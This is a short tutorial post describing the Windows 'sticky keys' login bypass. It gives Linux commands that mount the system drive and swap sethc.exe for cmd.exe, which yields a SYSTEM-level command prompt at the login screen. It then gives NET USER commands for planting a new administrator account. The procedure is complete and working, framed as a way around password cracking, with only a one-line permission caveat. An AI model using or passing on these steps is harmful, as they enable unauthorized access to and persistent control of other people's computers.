This is a very easy crack, allowing you to open a windows command prompt with system privileges at log-in. shouldn't take more than 3 minutes. It replaces sethc.exe which can be invoked at start-up by pressing shift five times (something to do with contrast) with cmd.exe: Since you haven't logged in yet it opens a command prompt with system privileges (runs in backtrack).
mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
cd ~
umount /mnt/ntfs
shutdown –r now
To make a new admin that you can login to (apart from EVERYTHING else that you can do) use the following commands (replace admin with the username and pass with your password)
NET USER admin pass /add
NET LOCALGROUP administrators admin /add
reboot and you're done.
No need to bother with cracking people's passwords (god forbid, this may take years, as with mine).
(please only use on your own computer or with other people's permission)